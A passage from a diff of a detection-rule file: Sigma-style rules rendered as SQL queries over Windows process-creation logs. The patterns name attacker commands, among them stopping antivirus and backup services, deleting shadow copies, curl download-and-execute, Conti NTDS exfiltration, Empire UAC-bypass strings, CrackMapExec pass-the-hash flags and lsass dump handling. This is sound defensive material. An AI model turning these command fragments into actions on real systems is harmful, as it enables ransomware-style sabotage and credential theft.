ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE '\\' OR CommandLine LIKE '%MSExchange%' ESCAPE '\\' OR CommandLine LIKE '%msftesq1SPROO%' ESCAPE '\\' OR CommandLine LIKE '%msftesql$PROD%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SQL\\_2008%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$SYSTEM\\_BGC%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAP$TPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPS%' ESCAPE '\\' OR CommandLine LIKE '%MSOLAPSTPSAMA%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ!I.SPROFXENGAGEMEHT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SHAREPOINT%' ESCAPE '\\' OR CommandLine LIKE '%MSSQ0SOPHOS%' ESCAPE '\\' OR CommandLine LIKE '%MSSQL%' ESCAPE '\\' OR CommandLine LIKE '%MySQL%' ESCAPE '\\' OR CommandLine LIKE '%NanoServiceMain%' ESCAPE '\\' OR CommandLine LIKE '%NetMsmqActivator%' ESCAPE '\\' OR CommandLine LIKE '%ntrtscan%' ESCAPE '\\' OR CommandLine LIKE '%ofcservice%' ESCAPE '\\' OR CommandLine LIKE '%Online Protection System%' ESCAPE '\\' OR CommandLine LIKE '%OracleClientCache80%' ESCAPE '\\' OR CommandLine LIKE '%PandaAetherAgent%' ESCAPE '\\' OR CommandLine LIKE '%PccNTUpd%' ESCAPE '\\' OR CommandLine LIKE '%PDVFSService%' ESCAPE '\\' OR CommandLine LIKE '%POP3Svc%' ESCAPE '\\' OR CommandLine LIKE '%POVFSService%' ESCAPE '\\' OR CommandLine LIKE '%PSUAService%' ESCAPE '\\' OR CommandLine LIKE '%Quick Update Service%' ESCAPE '\\' OR CommandLine LIKE '%RepairService%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer%' ESCAPE '\\' OR CommandLine LIKE '%ReportServer$%' ESCAPE '\\' OR CommandLine LIKE '%RESvc%' ESCAPE '\\' OR CommandLine LIKE '%RpcEptMapper%' ESCAPE '\\' OR CommandLine LIKE '%sacsvr%' ESCAPE '\\' OR CommandLine LIKE '%SamSs%' ESCAPE '\\' OR CommandLine LIKE '%SAVAdminService%' ESCAPE '\\' OR CommandLine LIKE '%SAVService%' ESCAPE '\\' OR CommandLine LIKE '%ScSecSvc%' ESCAPE '\\' OR CommandLine LIKE '%SDRSVC%' ESCAPE '\\' OR CommandLine LIKE '%SentinelAgent%' ESCAPE '\\' OR CommandLine LIKE '%SentinelHelperService%' ESCAPE '\\' OR CommandLine LIKE '%SepMasterService%' ESCAPE '\\' OR CommandLine LIKE '%ShMonitor%' ESCAPE '\\' OR CommandLine LIKE '%Smcinst%' ESCAPE '\\' OR CommandLine LIKE '%SmcService%' ESCAPE '\\' OR CommandLine LIKE '%SMTPSvc%' ESCAPE '\\' OR CommandLine LIKE '%SNAC%' ESCAPE '\\' OR CommandLine LIKE '%SntpService%' ESCAPE '\\' OR CommandLine LIKE '%Sophos%' ESCAPE '\\' OR CommandLine LIKE '%SQ1SafeOLRService%' ESCAPE '\\' OR CommandLine LIKE '%SQL Backups%' ESCAPE '\\' OR CommandLine LIKE '%SQL Server%' ESCAPE '\\' OR CommandLine LIKE '%SQLAgent%' ESCAPE '\\' OR CommandLine LIKE '%SQLBrowser%' ESCAPE '\\' OR CommandLine LIKE '%SQLsafe%' ESCAPE '\\' OR CommandLine LIKE '%SQLSERVERAGENT%' ESCAPE '\\' OR CommandLine LIKE '%SQLTELEMETRY%' ESCAPE '\\' OR CommandLine LIKE '%SQLWriter%' ESCAPE '\\' OR CommandLine LIKE '%SSISTELEMETRY130%' ESCAPE '\\' OR CommandLine LIKE '%SstpSvc%' ESCAPE '\\' OR CommandLine LIKE '%svcGenericHost%' ESCAPE '\\' OR CommandLine LIKE '%swc\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_filter%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_service%' ESCAPE '\\' OR CommandLine LIKE '%swi\\_update%' ESCAPE '\\' OR CommandLine LIKE '%Symantec%' ESCAPE '\\' OR CommandLine LIKE '%Telemetryserver%' ESCAPE '\\' OR CommandLine LIKE '%ThreatLockerService%' ESCAPE '\\' OR CommandLine LIKE '%TMBMServer%' ESCAPE '\\' OR CommandLine LIKE '%TmCCSF%' ESCAPE '\\' OR CommandLine LIKE '%TmFilter%' ESCAPE '\\' OR CommandLine LIKE '%TMiCRCScanService%' ESCAPE '\\' OR CommandLine LIKE '%tmlisten%' ESCAPE '\\' OR CommandLine LIKE '%TMLWCSService%' ESCAPE '\\' OR CommandLine LIKE '%TmPfw%' ESCAPE '\\' OR CommandLine LIKE '%TmPreFilter%' ESCAPE '\\' OR CommandLine LIKE '%TmProxy%' ESCAPE '\\' OR CommandLine LIKE '%TMSmartRelayService%' ESCAPE '\\' OR CommandLine LIKE '%tmusa%' ESCAPE '\\' OR CommandLine LIKE '%Trend Micro Deep Security Manager%' ESCAPE '\\' OR CommandLine LIKE '%TrueKey%' ESCAPE '\\' OR CommandLine LIKE '%UI0Detect%' ESCAPE '\\' OR CommandLine LIKE '%UTODetect%' ESCAPE '\\' OR CommandLine LIKE '%Veeam%' ESCAPE '\\' OR CommandLine LIKE '%VeemaDep/oySvc%' ESCAPE '\\' OR CommandLine LIKE '%Veritas System Recovery%' ESCAPE '\\' OR CommandLine LIKE '%VSApiNt%' ESCAPE '\\' OR CommandLine LIKE '%VSS%' ESCAPE '\\' OR CommandLine LIKE '%W3Svc%' ESCAPE '\\' OR CommandLine LIKE '%wbengine%' ESCAPE '\\' OR CommandLine LIKE '%WdNisSvc%' ESCAPE '\\' OR CommandLine LIKE '%WeanClOudSve%' ESCAPE '\\' OR CommandLine LIKE '%Weems JY%' ESCAPE '\\' OR CommandLine LIKE '%WinDefend%' ESCAPE '\\' OR CommandLine LIKE '%wozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%WRSVC%' ESCAPE '\\' OR CommandLine LIKE '%Zoolz 2 Service%' ESCAPE '\\') AND ((((OriginalFileName IN ('net.exe', 'net1.exe') OR (NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\')) AND CommandLine LIKE '% stop %' ESCAPE '\\') OR ((OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '%Stop-Service %' ESCAPE '\\' OR CommandLine LIKE '%Remove-Service %' ESCAPE '\\'))) OR ((OriginalFileName = 'sc.exe' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\') AND (CommandLine LIKE '% stop %' ESCAPE '\\' OR CommandLine LIKE '% delete %' ESCAPE '\\' OR CommandLine LIKE '% pause %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_openwith.yml" + "filename": "proc_creation_win_susp_service_tamper.yml" }, { - "title": "Suspicious Double Extension File Execution", - "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "status": "stable", - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", + "title": "Disabled IE Security Features", + "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", + "status": "test", + "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%.doc.exe' ESCAPE '\\' OR NewProcessName LIKE '%.docx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xls.exe' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.exe' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.exe' ESCAPE '\\' OR NewProcessName LIKE '%.txt.exe' ESCAPE '\\' OR NewProcessName LIKE '% .exe' ESCAPE '\\' OR NewProcessName LIKE '%\\_\\_\\_\\_\\_\\_.exe' ESCAPE '\\' OR NewProcessName LIKE '%.doc.js' ESCAPE '\\' OR NewProcessName LIKE '%.docx.js' ESCAPE '\\' OR NewProcessName LIKE '%.xls.js' ESCAPE '\\' OR NewProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR NewProcessName LIKE '%.ppt.js' ESCAPE '\\' OR NewProcessName LIKE '%.pptx.js' ESCAPE '\\' OR NewProcessName LIKE '%.rtf.js' ESCAPE '\\' OR NewProcessName LIKE '%.pdf.js' ESCAPE '\\' OR NewProcessName LIKE '%.txt.js' ESCAPE '\\') AND (CommandLine LIKE '%.doc.exe%' ESCAPE '\\' OR CommandLine LIKE '%.docx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xls.exe%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.exe%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.exe%' ESCAPE '\\' OR CommandLine LIKE '%.txt.exe%' ESCAPE '\\' OR CommandLine LIKE '% .exe%' ESCAPE '\\' OR CommandLine LIKE '%\\_\\_\\_\\_\\_\\_.exe%' ESCAPE '\\' OR CommandLine LIKE '%.doc.js%' ESCAPE '\\' OR CommandLine LIKE '%.docx.js%' ESCAPE '\\' OR CommandLine LIKE '%.xls.js%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR CommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR CommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR CommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR CommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR CommandLine LIKE '%.txt.js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_double_extension.yml" + "filename": "proc_creation_win_powershell_disable_ie_features.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", - "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion" - ], + "title": "HackTool - CrackMapExec Execution", + "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "status": "test", + "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" }, { "title": "Suspicious Regsvr32 Execution With Image Extension", @@ -12474,1656 +12115,1627 @@ "filename": "proc_creation_win_regsvr32_image.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", + "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "Potential Procdump Evasion", + "id": "79b06761-465f-4f88-9ef2-150e24d3d737", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Cases in which procdump just gets copied to a different directory without any renaming" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", + "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", + "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", - "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "title": "Renamed Vmnat.exe Execution", + "id": "7b4f794b-590a-4ad4-ba18-7964a2832205", + "status": "experimental", + "description": "Detects renamed vmnat.exe or portable version that can be used for DLL side-loading", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'vmnat.exe' AND NOT ((NewProcessName LIKE '%vmnat.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" + "filename": "proc_creation_win_renamed_vmnat.yml" }, { - "title": "Renamed CreateDump Utility Execution", - "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", - "status": "experimental", - "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious RazerInstaller Explorer Subprocess", + "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "status": "test", + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1553" ], "falsepositives": [ - "Command lines that use the same flags" + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_createdump.yml" + "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" }, { - "title": "Using SettingSyncHost.exe as LOLBin", - "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "title": "Potential Commandline Obfuscation Using Unicode Characters", + "id": "e0552b19-5a83-4222-b141-b36184bb8d79", "status": "test", - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "author": "Anton Kutepov, oscd.community", + "description": "Detects potential commandline obfuscation using unicode characters.\nAdversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1574.008" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ˣ%' ESCAPE '\\' OR CommandLine LIKE '%˪%' ESCAPE '\\' OR CommandLine LIKE '%ˢ%' ESCAPE '\\') OR (CommandLine LIKE '%∕%' ESCAPE '\\' OR CommandLine LIKE '%⁄%' ESCAPE '\\') OR (CommandLine LIKE '%―%' ESCAPE '\\' OR CommandLine LIKE '%—%' ESCAPE '\\') OR (CommandLine LIKE '%â%' ESCAPE '\\' OR CommandLine LIKE '%€%' ESCAPE '\\' OR CommandLine LIKE '%£%' ESCAPE '\\' OR CommandLine LIKE '%¯%' ESCAPE '\\' OR CommandLine LIKE '%®%' ESCAPE '\\' OR CommandLine LIKE '%µ%' ESCAPE '\\' OR CommandLine LIKE '%¶%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_settingsynchost.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_unicode.yml" }, { - "title": "Reg Add Suspicious Paths", - "id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", - "status": "experimental", - "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", - "author": "frack113, Nasreddine Bencherchali", + "title": "Suspicious WebDav Client Execution", + "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "status": "experimental", + "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562.001" + "attack.exfiltration", + "attack.t1048.003", + "cve.2023.23397" ], "falsepositives": [ - "Rare legitimate add to registry via cli (to these locations)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon%' ESCAPE '\\' OR CommandLine LIKE 